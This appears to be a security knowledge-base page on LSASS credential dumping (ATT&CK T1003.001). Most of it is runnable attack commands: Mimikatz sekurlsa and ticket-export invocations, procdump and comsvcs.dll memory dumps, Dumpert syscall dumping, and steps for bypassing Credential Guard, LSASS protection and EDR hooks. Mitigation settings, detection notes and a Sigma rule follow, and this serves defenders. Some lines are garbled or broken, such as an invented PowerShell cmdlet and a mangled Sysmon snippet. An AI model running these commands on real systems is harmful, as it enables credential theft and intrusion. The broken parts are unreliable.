Critical Severity | T1003.001
ðŸ LSASS Credential Dumping
ð§ Description
LSASS (Local Security Authority Subsystem Service) is a critical Windows process that handles authentication, enforces security policies, and stores user credentials in memory. Dumping LSASS allows attackers to extract plaintext passwords, hashes, and Kerberos tickets.
Why LSASS is Targeted:
- Centralized Credential Store: All authentication happens through LSASS
- Multiple Credential Types: NTLM hashes, Kerberos tickets, passwords, PINs
- SSPI Interface: All apps use LSASS for authentication
- Memory Storage: Cached credentials kept for SSO
ð£ Dumping Methods
1. Mimikatz (Direct Memory Read):
# Full credential dump mimikatz.exe privilege::debug sekurlsa::logonpasswords full sekurlsa::wdigest sekurlsa::kerberos sekurlsa::msv # Export tickets sekurlsa::tickets /export # Export TGTs sekurlsa::tgt
2. Procdump (Memory Dump + Offline Parse):
# Create lsass dump (AV may flag this) procdump.exe -accepteula -ma lsass.exe lsass.dmp # Silent exit (stealth) procdump.exe -accepteula -ma lsass.exe -o lsass.dmp -ma # Parse dump with Mimikatz mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" # Parse with pypykatz python3 pypykatz.py lsa minidump lsass.dmp
3. Living Off the Land (No Tools):
# Use comsvcs.dll (built-in) rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump C:\temp\lsass.dmp full # PowerShell MiniDump powershell -c "Get-Process lsass | MiniDumpWriteMiniDump C:\temp\lsass.dmp" # Use Debug Object (requires SeDebugPrivilege) # Enable debug via token manipulation
4. Hookless LSASS Dumping (EDR Bypass):
# Using Dr. Båç syscall approach # Bypass user-mode hooks on LSASS # Via Dumpert (Outflank) Dumpert.exe Dumpert.exe /OutputFile:C:\temp\lsass.dmp # Parse with Mimikatz mimikatz "sekurlsa::minidump C:\temp\lsass.dmp" "sekurlsa::logonpasswords"
5. RDP Session Dump:
# Dump from RDP session (less likely to be detected) # RDP caches credentials in user's context # Use ssp (security support provider) mimikatz "privilege::debug" "misc::ssp"
ð Credential Extraction
NTLM Hashes:
# Via Mimikatz mimikatz "privilege::debug" "sekurlsa::msv" "exit" # Format: username:rid:lmhash:nthash::: # Example: administrator:500:aad3b435b51404eeaad3b435b51404ee:hash:::
Kerberos Tickets:
# Export all tickets mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit" # Output: *.kirbi files # Import and use tickets kerberos::ptt ticket.kirbi # List tickets kerberos::list
WDigest Passwords (if enabled):
# Get plaintext passwords (if stored) mimikatz "privilege::debug" "sekurlsa::wdigest" "exit" # Requires WDigest enabled (older systems) # Or HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 1
Credential Manager (Generic Credentials):
# Target Credential Manager stores mimikatz "privilege::debug" "token::elevate" "vault::list" "exit" # Chrome, Edge passwords stored here # Internet Explorer saved passwords
ð¡ïž Defense Bypass Techniques
1. Credential Guard (Bypass):
# Credential Guard prevents direct memory read # Bypass techniques: # Use VCA (Virtualization-based Security) bypass # Requires kernel read primitive # Or target other processes (browser, services) mimikatz "privilege::debug" "sekurlsa::logonpasswords" # Use DPAPI theft before reaching LSASS # Extract from browser memory
2. LSASS Protection (Bypass):
# Protected Process Light (PPL) blocks direct access # Check protection level Get-Process lsass | select Name,Protection # Bypass PPL via kernel driver (not recommended) # Or via scheduled task with vulnerable DLL
3. EDR Hook Bypass:
# Unhook user-mode DLLs mimikatz "privilege::debug" "misc::unhook" "exit" # Or use direct syscalls (Dumpert approach) # Bypass ETW withNtQuerySystemInformation # Use direct syscalls in custom tool # Don't link against ntdll.dll (unhooked)
ð¡ïž Mitigation
â
Primary Controls:
- Enable Credential Guard: Hardware-based protection for credentials
- Enable LSASS PPL: Protected Process Light (Windows 10+)
- Disable WDigest: Prevent plaintext password caching
- Restrict Debug Privileges: Only Administrators have SeDebug
- Deploy EDR: Detect LSASS access patterns
- Network Segmentation: Limit lateral movement
Enable Credential Guard:
# Via GPO Computer Configuration > Administrative Templates > System > Device Guard > Turn On Virtualization Based Security # Require Secure Boot # Enable UEFI lock # Or via PowerShell (requires reboot) Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -Value 1
Enable LSASS PPL:
# Enable via registry REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f # Requires Windows 10 1803+ and SMBv3 # Verify Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name RunAsPPL
ð Detection
Sysmon Configuration:
# Monitor lsass.exe access# Alert on non-standard processes accessing lsass lsass.exe lsass.exe"> 0x1000
Windows Event Log:
# Event ID 4688 - Process Create # Look for: # - Parent process not typical (not explorer, services.exe) # - Command line contains lsass, procdump, mimikatz # - Process memory dump operations # Enable Process Tracking auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
Sigma Rules:
title: LSASS Process Access
id: lsass-access
detection:
selection:
EventID: 10
TargetImage|endswith: '\lsass.exe'
filter:
CallTrace|contains: 'ntdll.dll'
condition: selection and not filter
level: critical
ð ïž Tools
- Mimikatz: All-purpose credential extraction
- ProcDump: Sysinternals memory dump
- Dumpert: Syscall-based LSASS dump (EDR bypass)
- pypykatz: Python Mimikatz implementation for offline parsing
- lsassy: Fast LSASS parsing
- Sysmon: Security monitoring